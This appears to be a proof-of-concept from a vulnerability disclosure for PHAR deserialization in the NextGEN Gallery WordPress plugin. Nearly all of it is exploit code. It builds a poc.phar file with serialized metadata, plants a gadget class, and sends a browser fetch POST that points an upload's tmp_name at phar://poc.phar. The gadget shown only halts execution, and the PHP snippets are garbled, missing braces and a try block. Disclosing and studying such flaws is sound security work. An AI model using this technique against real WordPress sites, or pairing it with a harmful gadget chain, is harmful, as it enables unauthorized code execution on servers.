1. Ensure your WordPress installation is using PHP version 7.4 or earlier.
2. Create a Gallery and note its ID.
3. Create a `poc.phar` file using the following code, and add it to the root directory of the server:


class Evil {}

    $pharFile = 'poc.phar';

    if (file_exists($pharFile))

    $phar = new Phar($pharFile);

        $phar->addFromString( 'test.txt', 'text' );
        $phar->setStub( '<?php __HALT_COMPILER(); ?>' );
        $phar->setMetadata( new Evil() );

    echo "$pharFile successfully created" . PHP_EOL;
catch (Exception $e)
    echo $e->getMessage();

4. Add the following code to the server to simulate a gadget:

class Evil {
 function __wakeup() {
  die('Arbitrary deserialization');

5. Run the following code in your browser to see the deserialization occur, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly.

await (await fetch("/index.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
    "body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"image_list":[{"action":"upload","data_key":"a","filename":"xxxxxxx.jpg"}]}}]&extra_data={"a":{"tmp_name":"phar://poc.phar/tmp.png"}}',
    "method": "POST",
    "mode": "cors"